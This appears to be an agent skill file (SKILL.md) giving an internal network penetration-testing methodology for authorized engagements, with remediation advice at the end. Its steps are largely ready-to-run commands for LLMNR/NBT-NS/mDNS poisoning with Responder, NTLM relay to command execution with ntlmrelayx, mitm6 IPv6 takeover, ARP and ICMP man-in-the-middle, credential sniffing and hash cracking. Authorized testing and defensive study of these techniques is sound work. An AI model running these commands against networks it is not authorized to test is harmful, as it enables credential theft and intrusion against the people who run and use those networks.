performing-internal-network-pentesting
$
npx mdskill add xalgord/xalgorix/performing-internal-network-pentesting- When you have a foothold (drop box, VM, or compromised host) on an internal LAN - At the start of an internal engagement to discover live hosts, open ports, and services - When capturing credentials passively via broadcast/multicast name resolution poisoning - When performing man-in-the-middle to intercept traffic on a switched segment - When relaying captured NTLM authentication to reachable hosts for lateral movement
SKILL.md
.github/skills/performing-internal-network-pentestingView on GitHub ↗
--- name: performing-internal-network-pentesting description: Methodology for internal network penetration testing from a foothold on the LAN, covering host discovery, port scanning, passive/active sniffing, MitM (ARP/DNS/ICMP/DHCPv6), and LLMNR/NBT-NS/mDNS poisoning with Responder plus relay attacks during authorized engagements. domain: cybersecurity subdomain: penetration-testing tags: - penetration-testing - network-pentesting - host-discovery - llmnr-poisoning - mitm - ntlm-relay version: '1.0' author: xalgorix license: Apache-2.0 --- # Performing Internal Network Pentesting ## When to Use - When you have a foothold (drop box, VM, or compromised host) on an internal LAN - At the start of an internal engagement to discover live hosts, open ports, and services - When capturing credentials passively via broadcast/multicast name resolution poisoning - When performing man-in-the-middle to intercept traffic on a switched segment - When relaying captured NTLM authentication to reachable hosts for lateral movement ## Critical: Techniques Most Often Missed The highest-value internal technique is poisoning LLMNR/NBT-NS/mDNS — Windows hosts fall back to these unauthenticated broadcast protocols when DNS fails, leaking NetNTLM hashes. Many testers also forget to scan broadcast addresses and to disable SMB signing checks before relaying. ```bash # 1. Poison LLMNR / NBT-NS / mDNS to capture NetNTLMv1/v2 hashes (#1 internal win) responder -I eth0 -wv # analyze first; then drop -A to actively poison # captured hashes land in /usr/share/responder/logs/ -> crack with hashcat -m 5600 # 2. Relay instead of crack: find hosts WITHOUT SMB signing, then relay auth to them crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # signing:False hosts # turn OFF Responder's SMB/HTTP servers (Responder.conf: SMB=Off, HTTP=Off) first ntlmrelayx.py -tf targets.txt -smb2support -i # relay -> SOCKS / command exec # 3. Discover hosts on the broadcast domain you'd otherwise miss ping -b 10.10.5.255 # subnet broadcast reaches every local host nmap -sn <network> # ARP sweep (same L2 = reliable host discovery) nbtscan -r 192.168.0.1/24 # NetBIOS names # 4. IPv6 is usually unmonitored — mitm6 + relay is devastating in AD mitm6 -d domain.local # rogue DHCPv6/DNS; pair with ntlmrelayx -6 ``` How to CONFIRM: Responder logs a hash only when a victim actually queries a name it can't resolve — trigger it (or wait) and check `responder -I eth0` console plus `logs/`. For relay, a successful run prints `[*] Authenticating against smb://<target> SUCCEED` and (with `-i`) opens a SOCKS-able session. Validate captured NetNTLMv2 with `hashcat -m 5600`. ## Workflow ### Step 1: Host Discovery (you are on the same L2) ```bash # Passive (quiet) netdiscover -p p0f -i eth0 -o /tmp/p0f.log # Active nmap -sn <network> # ARP requests on local subnet netdiscover -r <network> nbtscan -r 192.168.0.1/24 ping -b 10.10.5.255 # subnet broadcast alive6 eth0 # IPv6 multicast ping # Bettercap recon # net.probe on ; net.show ``` ### Step 2: Port and Service Scanning ```bash masscan -p20,21-23,25,53,80,110,135,139,143,443,445,993,3306,3389,5900,8080 <network>/24 nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP> # top 1000 TCP nmap -sV -sC -O -T4 -n -Pn -p- -oA fullscan <IP> # all TCP nmap -sU -sV --version-intensity 0 -n -F -T4 <IP> # top UDP ``` ### Step 3: Passive and Active Sniffing ```bash # Passive capture (rotate files; filter sensitive protocols) sudo tcpdump -i eth0 -G 300 -w '/tmp/dump-%H%M%S.pcap' -W 50 'tcp and (port 80 or port 443)' sudo tcpdump -i eth0 udp port 53 # see what hosts resolve # Remote capture into local Wireshark ssh user@<TARGET> tcpdump -i ens160 -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Parse creds out of pcap or live PCredz -f capture.pcap # or -i eth0 ``` ### Step 4: Man-in-the-Middle ```bash # ARP spoofing (forward first!) echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -t 192.168.1.2 192.168.1.1 & arpspoof -t 192.168.1.1 192.168.1.2 & # Bettercap: arp.spoof on ; set arp.spoof.targets <IP> ; set arp.spoof.fullduplex true # DNS spoofing # bettercap: set dns.spoof.hosts ./dns.spoof.hosts ; dns.spoof on # ICMP redirect hping3 <VICTIM> -C 5 -K 1 -a <VICTIM_GW> --icmp-gw <ATTACKER> --icmp-ipdst <DST> --icmp-ipsrc <VICTIM> # IPv6 (mitm6 / DHCPv6 + rogue DNS — high impact in AD) mitm6 -d domain.local ``` ### Step 5: LLMNR/NBT-NS/mDNS Poisoning + Relay ```bash # Capture mode (crack offline) responder -I eth0 -wv hashcat -m 5600 hashes.txt rockyou.txt # NetNTLMv2 # Relay mode (no cracking needed): disable Responder SMB/HTTP, target unsigned hosts crackmapexec smb <network>/24 --gen-relay-list targets.txt ntlmrelayx.py -tf targets.txt -smb2support -i # interactive SOCKS ntlmrelayx.py -tf targets.txt -smb2support -c 'whoami' # command execution # Combine with IPv6 for WPAD/DNS takeover: mitm6 -d domain.local & ntlmrelayx.py -6 -wh attacker-wpad -tf targets.txt -smb2support ``` ## Key Concepts | Concept | Description | |---------|-------------| | **ARP discovery** | On the same L2, ARP requests reliably enumerate live hosts where ICMP is filtered | | **LLMNR / NBT-NS / mDNS** | Unauthenticated broadcast/multicast name resolution Windows/Apple/Linux fall back to; poisonable | | **NetNTLMv1/v2** | Challenge-response auth captured via poisoning; crack offline or relay (cannot pass-the-hash) | | **SMB signing** | If a target does NOT enforce signing, captured auth can be relayed to it for code exec | | **Relay vs crack** | Relaying forwards the live auth to another host; avoids needing the plaintext password | | **WPAD** | Proxy auto-discovery; Responder serves a rogue wpad.dat to harvest browser/credential auth | | **mitm6** | Abuses default Windows IPv6 preference to become DHCPv6/DNS and drive relay/WPAD attacks | ## Tools & Systems | Tool | Purpose | |------|---------| | **nmap / masscan** | Host discovery and TCP/UDP service scanning | | **netdiscover / nbtscan / arp-scan** | L2 host and NetBIOS name discovery | | **Responder** | Poison LLMNR/NBT-NS/mDNS, rogue WPAD/DNS/DHCP, capture NetNTLM | | **Impacket ntlmrelayx.py** | Relay captured NTLM auth to SMB/LDAP/HTTP targets (SOCKS, exec) | | **CrackMapExec / NetExec** | Build relay target lists, validate creds, sweep SMB | | **bettercap / arpspoof / ettercap** | ARP/DNS/ICMP MitM and sniffing | | **mitm6** | IPv6 DHCPv6/DNS takeover to amplify relay attacks | | **tcpdump / Wireshark / PCredz** | Capture and extract credentials from traffic | ## Common Scenarios ### Scenario 1: LLMNR Poisoning to Hash A misconfigured workstation queries a mistyped share name. Responder answers, the host authenticates, and a NetNTLMv2 hash is captured and cracked offline to a domain user password. ### Scenario 2: NTLM Relay to Unsigned Host SMB signing is not enforced on several servers. With Responder's SMB/HTTP off, ntlmrelayx relays poisoned authentication to a `signing:False` host, executing commands as the relayed account. ### Scenario 3: mitm6 + WPAD in AD The network is dual-stack but IPv6 is unmanaged. `mitm6` becomes the DHCPv6/DNS server, serves a rogue WPAD, and feeds authentications into ntlmrelayx against LDAP to add a machine or escalate. ### Scenario 4: ARP MitM Credential Sniffing On a flat switched segment, ARP spoofing places the tester between a client and an app server; PCredz extracts cleartext and NTLM credentials from the intercepted stream. ## Output Format ``` ## Internal Network Pentest Finding **Vulnerability**: LLMNR/NBT-NS poisoning + NTLM relay (no SMB signing) **Severity**: High (CVSS 8.1) **Location**: Internal VLAN 10.10.20.0/24 ### Reproduction Steps 1. responder -I eth0 -wv -> captured NetNTLMv2 for CORP\jsmith 2. crackmapexec smb 10.10.20.0/24 --gen-relay-list targets.txt (signing disabled hosts) 3. Disable Responder SMB/HTTP; ntlmrelayx.py -tf targets.txt -smb2support -c 'whoami' 4. Relayed jsmith auth to 10.10.20.40 -> executed as CORP\jsmith (local admin) ### Captured / Reached | Item | Detail | |------|--------| | NetNTLMv2 | CORP\jsmith (cracked: Summer2024!) | | Relay target | 10.10.20.40 (SMB signing not required) | | Access | Local admin command execution | ### Recommendation 1. Disable LLMNR (GPO) and NBT-NS; remove mDNS where unused 2. Enforce SMB signing (server and client) to block relay 3. Disable IPv6 if unused, or manage DHCPv6/RA to prevent mitm6 4. Enforce strong passwords/MFA; segment and monitor for ARP anomalies and rogue responders ```